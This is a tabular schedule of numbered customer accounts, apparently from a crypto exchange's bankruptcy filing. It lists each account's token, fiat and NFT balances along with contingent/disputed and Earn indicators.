| 07330171 | | BRZ[3], CUSDT[5], DOGE[.0000009], TRX[3], USD[0.00] | | |
| 07330172 | | CUSDT[4], TRX[4], USD[4.67] | | |
| 07330174 | | SUSHI[.00002588], USD[0.00], YFI[0] | | |
| 07330175 | | USD[0.01], USDT[1] | | |
| 07330176 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07330177 | | CUSDT[1], DOGE[8917.22912152], TRX[2], USD[0.00] | | |
| 07330178 | | BAT[3.83731543], CUSDT[8], SHIB[123397.22197573], USD[0.01], USDT[1.0843952] | Yes | |
| 07330179 | | BTC[0.00021088], USDT[4.98538567] | | |
| 07330180 | | USD[10.00] | | |
| 07330181 | | BAT[1], DOGE[0], USD[0.00], USDT[0] | | |
| 07330182 | | USD[10.00] | | |
| 07330183 | | USD[10.00] | | |
| 07330184 | | USD[0.00] | | |
| 07330185 | | USD[10.00] | | |
| 07330187 | | USD[0.00] | | |
| 07330188 | | USD[0.01] | | |
| 07330189 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07330190 | | BAT[3.15759043], BCH[.0212311], BRZ[2], BTC[.02974253], CUSDT[4], DOGE[3], GRT[66.10722198], SHIB[2], SUSHI[3.74516141], TRX[.01504184], USD[0.00], USDT[1.10664487] | Yes | |
| 07330191 | | USD[10.00] | | |
| 07330192 | | TRX[1], USD[0.01] | | |
| 07330193 | | AVAX[0.00000986], DAI[0.00619734], ETH[0.00000489], ETHW[0.00000059], KSHIB[0], LINK[0], MATIC[0], PAXG[0.00000220], SHIB[34], TRX[1], USD[0.01], USDT[0.00000914] | Yes | |
| 07330194 | | USD[10.00] | | |
| 07330195 | | ETH[.00002176], ETHW[0.00002175], USD[0.00] | Yes | |
| 07330196 | | USD[10.00] | | |
| 07330197 | | DOGE[5.62051267], USD[0.00], USDT[0] | | |
| 07330198 | | DOGE[1], SOL[0], SUSHI[1.03432501], USD[0.00] | | |
| 07330199 | | BRZ[1], CUSDT[9], USD[0.00] | | |
| 07330200 | | USD[10.00] | | |
| 07330201 | | SHIB[156697.97431656], USD[0.00] | Yes | |
| 07330202 | | BTC[.01240262], CUSDT[1], DOGE[0], KSHIB[6275.10617553], SHIB[6787715.12172428], TRX[2], USD[0.00] | Yes | |
| 07330203 | | USD[10.00] | | |
| 07330205 | | USD[10.00] | | |
| 07330206 | | BRZ[1], CUSDT[1], TRX[5], USD[0.00], USDT[0] | | |
| 07330207 | | USD[10.00] | | |
| 07330208 | | USD[10.00] | | |
| 07330209 | | USD[10.00] | | |
| 07330211 | | BAT[0], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07330213 | | BRZ[13.5922876], CUSDT[198.93125672], DOGE[21.55210402], SHIB[3], SOL[.00049295], USD[0.01], USDT[0] | | |
| 07330216 | | DOGE[.0145], USD[7.65] | | |
| 07330217 | | USD[10.00] | | |
| 07330218 | | ETH[.0002], ETHW[.0002], USD[3.50] | | |
| 07330219 | | BAT[3.2925491], BRZ[1], CUSDT[1], DOGE[9870.52881326], TRX[9.01851208], USD[0.00], USDT[4.43175705] | Yes | |
| 07330220 | | USD[10.00] | | |
| 07330221 | | USD[110.00] | | |
| 07330222 | | CUSDT[1], SHIB[2], USD[12.35] | Yes | |
| 07330223 | | BRZ[1], USD[0.85] | | |
| 07330225 | | BF_POINT[200], ETH[.00000001], USD[11.06] | Yes | |
| 07330226 | | USD[10.00] | | |
| 07330227 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330228 | | CUSDT[776.01912277], TRX[63.66728742], USD[0.00]. USDT[10.92025335] | Yes | |
| 07330229 | | USD[10.00] | | |
| 07330230 | | USD[10.00] | | |
| 07330231 | | USD[10.00] | | |
| 07330232 | | CUSDT[3], DAI[0], ETH[0], USD[0.00] | Yes | |
| 07330233 | | BTC[.00192286], CUSDT[1], DOGE[41854.51723228], TRX[3], USD[0.00] | | |
| 07330234 | | CUSDT[1], USD[0.00] | | |
| 07330235 | | USD[0.19] | | |
| 07330236 | | BTC[0.00001393], ETH[.00035702], ETHW[.00035702], GRT[.752], LINK[.0856], TRX[.716], USD[1.24], USDT[3.90385] | | |
| 07330237 | | USD[10.00] | | |
| 07330238 | | ETH[.00514351], ETHW[.00514351], USD[0.00] | | |
| 07330239 | | AUD[0.00], BTC[0], CUSDT[2], DAI[0], DOGE[0], ETH[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[.00000892] | Yes | |
| 07330240 | | USD[10.00] | | |
| 07330241 | | GRT[4.18619707], USD[0.00] | | |
| 07330242 | | SUSHI[11.29430984], USD[0.00] | | |
| 07330243 | | USD[10.00] | | |
| 07330244 | | USD[10.00] | | |
| 07330245 | | BRZ[2], CUSDT[5], USD[0.00] | | |
| 07330246 | | DOGE[3058.70153967], TRX[1], USD[11.04] | Yes | |
| 07330247 | | BRZ[1], CUSDT[5], DOGE[.00006373], GRT[1], TRX[302.04242871], USD[0.00] | | |
| 07330249 | | USD[10.00] | | |
| 07330250 | | BRZ[1], BTC[.00076359], CUSDT[1], DOGE[848.65453015], GBP[15.21], TRX[67.05902563], USD[0.62] | Yes | |
| 07330251 | | USD[10.00] | | |
| 07330252 | | BTC[0], DOGE[0], GRT[0], TRX[3], USD[0.00], USDT[0] | | |
| 07330253 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07330254 | | USD[10.00] | | |
| 07330255 | | DOGE[0], ETH[0], GRT[0], UNI[0], USD[0.72], USDT[0] | | |
| 07330256 | | USD[10.00] | | |
| 07330257 | | BRZ[3], CUSDT[3], DOGE[.00865549], UNI[1], USD[0.00] | | |
| 07330258 | | USD[0.49] | | |
| 07330259 | | USD[10.00] | | |
| 07330260 | | BAT[367.30020436], BRZ[1], BTC[.09323527], CUSDT[5], DOGE[7.33052765], GRT[1.00498957], LINK[32.87524135], MKR[.01885534], SHIB[1], SOL[17.70766636], SUSHI[22.29911972], TRX[11714.31714941], UNI[19.40756045], USD[0.00], USDT[1.10408089] | Yes | |
| 07330261 | | DOGE[.94455], USD[66.09] | | |
| 07330262 | | CUSDT[1], DOGE[3], USD[0.00] | | |
| 07330263 | | CUSDT[2], DOGE[220.7579416], USD[0.05] | Yes | |
| 07330264 | | ETH[0], ETHW[0], NFT (542040119978723473/Seer's Stone)[1], USD[0.00] | | |
| 07330265 | | CUSDT[9.08261852], TRX[3], USD[0.01], USDT[0] | | |
| 07330266 | | USD[10.00] | | |
| 07330268 | | USD[10.00] | | |
| 07330269 | | USD[0.00] | | |
| 07330270 | | BTC[.00020198], TRX[1], USD[0.00] | | |
| 07330273 | | USD[10.00] | | |
| 07330275 | | USD[10.00] | | |
| 07330277 | | USD[10.00] | | |
| 07330278 | | USD[10.00] | | |
| 07330279 | | ALGO[.61493835], AVAX[.39159483], BRZ[1], DOGE[.3417709], GRT[696.19012992], MATIC[.3369802], SHIB[79665.38866702], TRX[219.05486666], UNI[.00006932], USD[0.00] | Yes | |
| 07330281 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], LTC[0], SUSHI[0], USD[0.00] | | |
| 07330282 | | CUSDT[1], DOGE[.00001727], ETH[.0014987], ETHW[.0014987], USD[2.48] | | |
| 07330283 | | USD[0.01] | | |
| 07330284 | | USD[10.00] | | |
| 07330285 | | USD[10.00] | | |
| 07330286 | | BF_POINT[100], BTC[.00585094], NFT (328958252213589476/APEFUEL by Almond Breeze #822)[1], SHIB[10464629.55211385], TRX[2], USD[0.00] | | |
| 07330287 | | BRZ[1], BTC[.00488643], CUSDT[1], DOGE[1967.95758208], TRX[4], USD[0.00] | | |
| 07330288 | Contingent, Disputed | CUSDT[1], DOGE[6813.00203064], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07330289 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07330290 | | BTC[.0002845], DOGE[101.80946373], ETH[.00273846], ETHW[.00273846], LINK[.21847132], LTC[.03437557], SOL[1.83732653], USD[0.00] | | |
| 07330291 | | USD[10.00] | | |
| 07330293 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330294 | | BTC[.00092203], DOGE[4.01621536], SHIB[51652.15552459], TRX[4.16814975], USD[0.00] | Yes | |
| 07330295 | | USD[10.00] | | |
| 07330296 | | BTC[0], DOGE[.00016296], SOL[0], SUSHI[0], USD[0.00] | | |
| 07330297 | | DOGE[1], USD[0.00] | | |
| 07330298 | | USD[10.00] | | |
| 07330299 | | USD[60.00] | | |
| 07330300 | | BAT[0], CUSDT[4], DOGE[2], USD[54.00] | | |
| 07330301 | | USD[10.00] | | |
| 07330303 | | USD[10.00] | | |
| 07330304 | | CUSDT[4], UNI[.45954724], USD[0.00] | Yes | |
| 07330305 | | DOGE[215.44256378], USD[0.00] | Yes | |
| 07330306 | | AVAX[2.03060601], BTC[.0055135], LINK[3.04991736], LTC[1.02072481], NEAR[6.0569381], SHIB[3090452.87357725], USD[0.00] | Yes | |
| 07330307 | | BRZ[1], CUSDT[4], DOGE[5116.67692149], GRT[31.38583631], SHIB[1], TRX[1], UNI[.0001988], USD[0.00] | Yes | |
| 07330308 | | CUSDT[1], USD[0.01] | | |
| 07330310 | | CUSDT[.996], DOGE[0], USD[0.01] | | |
| 07330311 | | USD[10.00] | | |
| 07330312 | | SUSHI[.6842181], USD[0.00] | | |
| 07330313 | | BRZ[1], CUSDT[1], USD[35.39] | | |
| 07330314 | | USD[10.00] | | |
| 07330315 | | CUSDT[2], TRX[1], USD[0.01], USDT[1.08833394] | Yes | |
| 07330317 | | USD[10.00] | | |
| 07330318 | | DOGE[14.88355848], USD[1.00] | | |
| 07330319 | | USD[10.00] | | |
| 07330320 | | DOGE[257.36765336], TRX[2], USD[0.00], USDT[0.00000089] | | |
| 07330321 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07330322 | | DOGE[25.04669267], USD[0.00] | | |
| 07330323 | | USD[10.00] | | |
| 07330324 | | BTC[0], ETH[0], ETHW[0], KSHIB[0], SHIB[972.24242744], USD[0.00] | Yes | |
| 07330325 | | CUSDT[1832.67020827], TRX[1187.58028767], USD[0.01] | Yes | |
| 07330326 | | CUSDT[2], DOGE[1], SHIB[3322457.7077736], USD[0.00] | Yes | |
| 07330327 | | ETH[.0017055], ETHW[.0017055], USD[0.00] | | |
| 07330328 | | BTC[.00021054], CUSDT[12], DOGE[3732.48125391], ETH[.02306181], ETHW[.02306181], TRX[1], USD[0.00] | | |
| 07330329 | | USD[10.00] | | |
| 07330330 | | BAT[2.12901258], CUSDT[3], DOGE[340.17223029], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07330331 | | DOGE[4617.61320064], USD[0.00] | | |
| 07330332 | | CUSDT[2], DOGE[2], ETH[0], ETHW[0], TRX[1], USD[0.01] | | |
| 07330333 | | USD[0.05] | | |
| 07330334 | | USD[10.00] | | |
| 07330336 | | USD[0.00] | Yes | |
| 07330337 | | USD[10.00] | | |
| 07330338 | | USD[0.01] | | |
| 07330339 | | USD[10.00] | | |
| 07330340 | | USD[10.00] | | |
| 07330341 | | BF_POINT[100], BTC[.00443403], DOGE[7433.55447721], ETH[.00000002], ETHW[0], LINK[80.58398473], NFT (313011817599454101/Miami Ticket Stub #167)[1], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07330343 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07330344 | | USD[10.00] | | |
| 07330345 | | USD[0.00] | | |
| 07330347 | | USD[0.00] | | |
| 07330348 | | USD[0.00] | | |
| 07330349 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07330351 | | SOL[0], TRX[12.99890484], USD[0.00], USDT[0] | | |
| 07330352 | | BAT[0], DOGE[44.96439570], GRT[0], USD[0.02] | Yes | |
| 07330354 | | CUSDT[1], DOGE[.00004423], USD[0.00] | | |
| 07330356 | | BCH[0], BRZ[0], BTC[0], DOGE[0.02689889], ETH[0], SHIB[444757.45675333], SUSHI[0], USD[243.90], USDT[0] | Yes | |
| 07330357 | | USD[10.00] | | |
| 07330358 | | USD[10.00] | | |
| 07330359 | | BTC[0], DOGE[0], GRT[0], SUSHI[0], USD[0.00] | | |
| 07330360 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330361 | | DOGE[2035.44353595], USD[0.00] | | |
| 07330362 | | MATIC[6.81094674], USD[0.00] | Yes | |
| 07330363 | | DOGE[.00004238], USD[0.00] | | |
| 07330365 | | USD[10.00] | | |
| 07330366 | | USD[0.01] | | |
| 07330368 | | CUSDT[1], DOGE[43.49291609], USD[5.00] | | |
| 07330369 | | USD[10.32] | Yes | |
| 07330371 | | USD[10.00], USDT[0] | | |
| 07330372 | | USD[0.00] | | |
| 07330373 | | USD[10.00] | | |
| 07330376 | | BRZ[0], BTC[0], DOGE[0], ETH[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07330379 | | USD[10.00] | | |
| 07330380 | | BTC[0.00062424], DOGE[26.57902637], ETH[.00532432], ETHW[.00532432], USD[0.00] | | |
| 07330381 | | CUSDT[1], DOGE[.00002916], USD[17.71] | | |
| 07330383 | | BTC[.00004559], USD[5.06] | | |
| 07330384 | | DOGE[0], USD[0.00] | | |
| 07330385 | | USD[10.00] | | |
| 07330386 | | BRZ[2], CUSDT[1], DOGE[1133.30852954], USD[0.00] | | |
| 07330387 | | USD[10.00] | | |
| 07330388 | | USD[10.00] | | |
| 07330389 | | DOGE[578.46535226], GRT[1.00367791], USD[0.66] | Yes | |
| 07330390 | | BAT[1], BRZ[1], CUSDT[2], DOGE[13966.93225749], ETH[.12181263], ETHW[.12181263], TRX[1], USD[0.00] | | |
| 07330391 | | CUSDT[7], TRX[1], USD[37.61] | | |
| 07330392 | Contingent, Disputed | BTC[.00000813], DOGE[83.04480248], USD[7.12] | | |
| 07330393 | | CUSDT[13], DOGE[400.1251446], SHIB[162372.46051915], USD[0.00] | Yes | |
| 07330394 | | TRX[1], USD[0.01] | | |
| 07330395 | | ETH[0], USD[0.00] | | |
| 07330396 | | USD[20.00] | | |
| 07330397 | | USD[10.00] | | |
| 07330398 | | USD[10.00] | | |
| 07330399 | | USD[10.00] | | |
| 07330400 | | BRZ[1], DOGE[1.03212616], USD[0.01] | Yes | |
| 07330402 | | DOGE[.017], USD[72.03] | | |
| 07330403 | | DOGE[28.13254875], USD[0.00] | | |
| 07330404 | | DOGE[0], ETH[.00000001], USD[0.00] | | |
| 07330405 | | USD[10.00] | | |
| 07330406 | | BRZ[1], CUSDT[3], DOGE[.00773671], GRT[1], SHIB[1], TRX[1], USD[0.12], USDT[1] | | |
| 07330407 | | TRX[2], USD[0.00] | | |
| 07330409 | | USD[10.00] | | |
| 07330410 | | USD[10.00] | | |
| 07330411 | | USD[10.00] | | |
| 07330412 | | BAT[0], BCH[0], BTC[0], CUSDT[2], DOGE[1], ETH[0], ETHW[0], TRX[0], USD[0.00], USDT[0] | | |
| 07330413 | | DOGE[36.29865722], USD[0.00] | | |
| 07330414 | | USD[10.00] | | |
| 07330415 | | CUSDT[2], ETH[.00294396], ETHW[.00294396], NFT (385748830626692209/273)[1], SHIB[5542.16958627], SOL[0], USD[0.00] | | |
| 07330416 | | USD[10.00] | | |
| 07330417 | | DOGE[22.11887252], USD[0.00] | | |
| 07330418 | | BTC[.0000009], DOGE[2], ETH[.00005629], ETHW[.00005629], SHIB[.00000392], TRX[2], USD[0.00] | Yes | |
| 07330419 | | USD[10.00] | | |
| 07330420 | | USD[0.02] | Yes | |
| 07330421 | | CUSDT[19], DOGE[21.01789357], USD[0.02] | | |
| 07330423 | | USD[10.00] | | |
| 07330425 | | BTC[0.00008030] | | |
| 07330426 | | USD[10.00] | | |
| 07330427 | | BRZ[2], SHIB[1886137.39157914], USD[0.00], USDT[0] | Yes | |
| 07330428 | | CUSDT[4], DOGE[7426.02782401], NFT (377947305101230892/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #59)[1], USD[0.00] | | |
| 07330429 | | BRZ[0], DOGE[6.18942923], ETHW[.06156785], SUSHI[5.04123105], USD[0.00] | Yes | |
| 07330430 | | DOGE[15.13243796], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330431 | | DOGE[118.85841033], TRX[1], USD[0.00] | | |
| 07330432 | | BRZ[23.02650579], CUSDT[259.54337245], DOGE[191.07135068], TRX[156.01884831], USD[0.00] | Yes | |
| 07330433 | | MATIC[8.96386738], SHIB[8.74637221], USD[0.00] | Yes | |
| 07330434 | | USD[10.00] | | |
| 07330435 | | USD[10.00] | | |
| 07330436 | | USD[10.00] | | |
| 07330437 | | DOGE[23.97952666], SHIB[85184.92356937], USD[0.00] | Yes | |
| 07330438 | | BRZ[0], SHIB[1], USD[1162.04] | | |
| 07330439 | | BTC[0], CUSDT[4], DOGE[3], TRX[1], UNI[0], USD[0.01], USDT[1.00000001] | | |
| 07330442 | | BRZ[1], DOGE[16546.20902499], ETH[.01691656], ETHW[.01691656], SHIB[3], TRX[1], USD[0.00] | | |
| 07330443 | | BCH[.00000376], CUSDT[4], DOGE[.01298653], TRX[.00480186], USD[0.00] | Yes | |
| 07330444 | | GRT[4.75725719], USD[0.00] | | |
| 07330445 | | USD[0.00] | | |
| 07330446 | | BAT[7], BRZ[9], CUSDT[16], GRT[9], TRX[27], USD[0.83], USDT[0] | | |
| 07330448 | | USD[10.00] | | |
| 07330449 | | USD[0.00] | Yes | |
| 07330451 | | DOGE[143.49907572], USD[0.00] | | |
| 07330452 | | USD[10.00] | | |
| 07330454 | | USD[10.00] | | |
| 07330455 | | BAT[1], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07330456 | | BTC[.00000001], DOGE[0], LTC[.34091254], SHIB[3049.69762499], USD[0.00] | Yes | |
| 07330457 | | BTC[.01221585], CUSDT[4], DOGE[174.04903758], ETH[.01739288], ETHW[.017174], MATIC[70.74646306], SOL[6.49059589], TRX[1.06753142], UNI[2.48115877], USD[0.00], USDT[1.80218115] | Yes | |
| 07330458 | | USD[0.00] | | |
| 07330459 | | USD[10.00] | | |
| 07330460 | | USD[10.00] | | |
| 07330461 | | USD[10.00] | | |
| 07330462 | | GRT[8.91591193], USD[0.00] | | |
| 07330463 | | BRZ[1], BTC[0], CUSDT[13], DOGE[1], ETH[0.00000003], ETHW[0.00000003], SUSHI[0], TRX[2], USD[0.00] | Yes | |
| 07330465 | | USD[0.00] | | |
| 07330466 | | CUSDT[4], DOGE[1], NFT (521607320549324850/3D CATPUNK #3947)[1], SOL[9.98174881], TRX[3], USD[0.01] | | |
| 07330467 | | USD[10.00] | | |
| 07330468 | | USD[10.00] | | |
| 07330469 | | USD[10.00] | | |
| 07330470 | | USD[10.00] | | |
| 07330471 | | SHIB[132.75188284], USD[0.00] | Yes | |
| 07330472 | | BRZ[3], CUSDT[4], DOGE[335.99489657], ETH[.30777413], ETHW[.30777413], SHIB[4114379.25505491], TRX[1], USD[0.00] | | |
| 07330473 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07330474 | | USD[10.00] | | |
| 07330476 | | USD[0.00] | | |
| 07330477 | | ETHW[.51284824], SHIB[1], USD[0.00] | Yes | |
| 07330478 | | USD[10.00] | | |
| 07330479 | | USD[10.00] | | |
| 07330480 | | USD[10.00] | | |
| 07330481 | | USD[10.00] | | |
| 07330482 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07330483 | | DOGE[1], USD[0.01], USDT[0] | | |
| 07330484 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07330485 | | BTC[0], TRX[.00098545], USD[0.00] | Yes | |
| 07330487 | | DOGE[28.86388909], USD[0.00] | Yes | |
| 07330488 | | USD[10.00] | | |
| 07330489 | | USD[10.00] | | |
| 07330490 | | USD[10.00] | | |
| 07330492 | | USD[10.00] | | |
| 07330493 | | CUSDT[3], DOGE[1], LINK[.57598861], USD[0.00] | | |
| 07330494 | | USD[10.00] | | |
| 07330495 | | USD[10.00] | | |
| 07330496 | | USD[10.00] | | |
| 07330497 | | CUSDT[1], DOGE[1.04499554], ETH[.0460295], ETHW[.04545494], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330499 | | USD[10.00] | | |
| 07330501 | | USD[0.00] | Yes | |
| 07330502 | | USD[10.00] | | |
| 07330503 | | USD[10.00] | | |
| 07330504 | | USD[10.00] | | |
| 07330505 | | USD[10.00] | | |
| 07330506 | | BTC[.0001712], USD[0.00] | | |
| 07330507 | | USD[10.00] | | |
| 07330508 | | USD[0.00] | | |
| 07330509 | | DOGE[1], USD[10.00] | | |
| 07330510 | | USD[10.00] | | |
| 07330511 | | USD[10.00] | | |
| 07330512 | | CUSDT[1], USD[0.00] | | |
| 07330513 | | DOGE[1], GRT[2.04605631], KSHIB[.00000794], SOL[0], TRX[2], USD[0.01] | Yes | |
| 07330514 | | USD[10.00] | | |
| 07330515 | | USD[10.00] | | |
| 07330516 | | CUSDT[1], DOGE[4], GRT[21.05977505], TRX[0], USD[0.00] | | |
| 07330517 | Contingent, Disputed | USD[0.00] | | |
| 07330518 | | USD[10.00] | | |
| 07330519 | | USD[10.00] | | |
| 07330520 | | USD[10.00] | | |
| 07330521 | | USD[10.00] | | |
| 07330522 | | USD[10.00] | | |
| 07330523 | | USD[10.00] | | |
| 07330525 | | DOGE[1], USD[21.33] | | |
| 07330526 | | BRZ[1], USD[0.00] | | |
| 07330527 | | BAT[1], CUSDT[15], DOGE[0], ETH[0], LTC[0], TRX[0.00001287], UNI[.04418099], USD[0.00], USDT[0.00000005] | | |
| 07330528 | | USD[10.00] | | |
| 07330529 | | AAVE[0], SHIB[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07330530 | | USD[10.00] | | |
| 07330531 | | USD[10.00] | | |
| 07330532 | | CUSDT[1], DOGE[137.4847495], USD[0.00] | | |
| 07330533 | | BTC[.00023326], DOGE[1], USD[0.00] | Yes | |
| 07330534 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07330535 | | USD[10.00] | | |
| 07330536 | | USD[10.00] | | |
| 07330537 | | DOGE[0], USD[0.00] | | |
| 07330538 | | USD[10.00] | | |
| 07330539 | | USD[10.00] | | |
| 07330541 | | USD[0.00] | | |
| 07330542 | | BRZ[0], BTC[0], DOGE[0], ETH[0], UNI[0], USD[0.00], USDT[0] | | |
| 07330543 | | BRZ[2], CUSDT[2], DOGE[2.03419758], TRX[2], USD[0.00] | | |
| 07330544 | | USD[10.00] | | |
| 07330545 | | DOGE[0], TRX[1], USD[0.00] | | |
| 07330547 | | USD[10.00] | | |
| 07330548 | | BAT[1], BRZ[2], BTC[.00000889], CAD[0.93], CUSDT[5], DOGE[1], LINK[.00085815], SUSHI[.00277557], USD[0.00] | | |
| 07330549 | | CUSDT[4], DOGE[3], TRX[3], USD[0.00] | | |
| 07330550 | | USD[10.00] | | |
| 07330551 | | NFT (349451568234190126/Little Rocks #204)[1], NFT (403073561884929909/Bahrain Ticket Stub #381)[1], NFT (526134297696876595/Entrance Voucher #2338)[1], USD[4.15] | Yes | |
| 07330552 | | BAT[2], BRZ[1], CUSDT[1], DOGE[3], GRT[1], TRX[4], USD[13.20] | | |
| 07330553 | | BTC[.00859183], DOGE[109.94455], SOL[3.5066655], USD[0.43] | | |
| 07330554 | | BRZ[1], DOGE[.00003628], TRX[1], USD[183.11] | | |
| 07330555 | | USD[10.00] | | |
| 07330556 | | CUSDT[1], DOGE[1.00004112], USD[84.37] | | |
| 07330558 | | USD[10.00] | | |
| 07330559 | | BRZ[1], CUSDT[1], DOGE[3], MATIC[0.00056511], TRX[1], USD[0.00] | Yes | |
| 07330560 | | CUSDT[3], DOGE[428.14466071], SHIB[338896.45304625], TRX[642.09909497], USD[0.00] | Yes | |
| 07330561 | | CUSDT[1], DOGE[1], LTC[0], SHIB[1], TRX[1], USD[0.00], USDT[104.90431628] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330562 | | DOGE[56.96269034], TRX[1.98495805], USD[0.00] | | |
| 07330563 | | CUSDT[1], DOGE[.00000378], USD[0.01] | | |
| 07330564 | | USD[10.00] | | |
| 07330565 | | USD[10.00] | | |
| 07330566 | | DOGE[38.50755218], USD[1.88] | | |
| 07330567 | | BRZ[1.00000078], BTC[0], CUSDT[3], DOGE[0], ETH[0.00000007], ETHW[0.00000007], GRT[0], LTC[0], TRX[0], USD[0.00] | Yes | |
| 07330569 | | ETH[.00547027], ETHW[.00547027], USD[0.00] | | |
| 07330570 | | USD[10.36] | Yes | |
| 07330571 | | USD[10.00] | | |
| 07330572 | | USD[10.00] | | |
| 07330573 | | BTC[.00020816], USD[0.00] | Yes | |
| 07330575 | | USD[10.00] | | |
| 07330576 | | USD[10.00] | | |
| 07330577 | | USD[0.01] | | |
| 07330578 | | USD[10.00] | | |
| 07330579 | | USD[10.00] | | |
| 07330580 | | USD[10.00] | | |
| 07330581 | | DOGE[133.57920812], TRX[1], USD[0.00] | | |
| 07330582 | | AVAX[.5120899], BF_POINT[500], BRZ[1], BTC[0.00211610], DOGE[1], ETH[0.01431193], ETHW[0.01413409], LINK[2.82977463], LTC[.36894064], SHIB[5], SOL[0.44905934], SUSHI[0], USD[101.52], USDT[0] | Yes | |
| 07330583 | | USD[10.00] | | |
| 07330584 | | BRZ[2], DOGE[1], TRX[3], USD[0.00] | | |
| 07330585 | | USD[10.00] | | |
| 07330586 | | USD[10.00] | | |
| 07330587 | | BAT[1], BRZ[1], CUSDT[2], GRT[1], LINK[.9566797], SUSHI[1], TRX[5], USD[10.00], USDT[2] | | |
| 07330588 | | BTC[0], CUSDT[2], SHIB[5813762.3520658], USD[0.00] | Yes | |
| 07330589 | | USD[10.00] | | |
| 07330590 | | USD[0.01] | | |
| 07330591 | | USD[10.00] | | |
| 07330592 | | USD[10.00] | | |
| 07330593 | | BTC[0], SOL[0], USD[0.00] | | |
| 07330594 | | DOGE[1.00017979], SHIB[133593.57624476], TRX[1], USD[0.00] | Yes | |
| 07330595 | | USD[10.00] | | |
| 07330596 | | USD[10.00] | | |
| 07330597 | | USD[10.00] | | |
| 07330599 | | CUSDT[2], ETH[0], ETHW[0], TRX[2], USD[0.09] | | |
| 07330600 | | USD[10.00] | | |
| 07330601 | | BAT[1], BCH[0.00175686], BRZ[0], CAD[0.01], CUSDT[6], DAI[0], DOGE[1], ETH[0], GRT[0], KSHIB[4342.43619078], LINK[0.00002962], LTC[.00001106], MATIC[0.42328753], PAXG[0], SHIB[10], SOL[0], TRX[5], USD[0.00], USDT[1.11025878] | Yes | |
| 07330603 | | TRX[234.63354783], USD[0.00] | Yes | |
| 07330604 | | BRZ[1], BTC[.0123541], CUSDT[2], TRX[3], UNI[.5652677], USD[0.00] | Yes | |
| 07330605 | | CUSDT[1], DOGE[2174.66843193], USD[0.00] | | |
| 07330606 | | USD[10.00] | | |
| 07330607 | | USD[10.00] | | |
| 07330608 | | DOGE[1], USD[0.00] | | |
| 07330609 | | USD[10.00] | | |
| 07330610 | | CUSDT[1], DOGE[138.40567572], USD[0.01] | | |
| 07330611 | | USD[0.00] | Yes | |
| 07330612 | | BRZ[4], BTC[0], CUSDT[10], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0.40539783], SOL[0], SUSHI[6.50566505], TRX[6], UNI[2.74802678], USD[0.00], USDT[1.10416153], YFI[0] | Yes | |
| 07330613 | | USD[10.00] | | |
| 07330614 | | USD[10.00] | | |
| 07330615 | | USD[10.00] | | |
| 07330616 | | USD[10.00] | | |
| 07330617 | | USD[10.00] | | |
| 07330618 | | BAT[3105.15451712], CUSDT[1], DOGE[1], SOL[1.7552263], UNI[18.3342861], USD[0.00] | Yes | |
| 07330619 | | DOGE[166.44215357], USD[0.00] | Yes | |
| 07330620 | | DOGE[132.8283377], USD[0.00] | | |
| 07330621 | | USD[0.01] | | |
| 07330622 | | CUSDT[3], SUSHI[0], USD[0.00] | Yes | |
| 07330624 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330625 | | TRX[2], USD[0.00] | Yes | |
| 07330626 | | DOGE[3715.87783489], ETH[.11403883], ETHW[.11403883], USD[10.00] | | |
| 07330627 | | ALGO[5.84694043], BTC[.0000005], ETH[.00304311], LINK[0.27640771], SHIB[18176688.13997422], TRX[1], USD[958.69] | Yes | |
| 07330628 | | BAT[1], BRZ[1], USD[0.00] | | |
| 07330630 | | CUSDT[1], DOGE[2229.32792626], SHIB[2250053.4568], TRX[80.61212332], USD[0.00] | | |
| 07330631 | | USD[10.00] | | |
| 07330632 | | DOGE[0], USD[0.00] | | |
| 07330633 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07330634 | | BTC[0], DOGE[0] | | |
| 07330636 | | USD[10.00] | | |
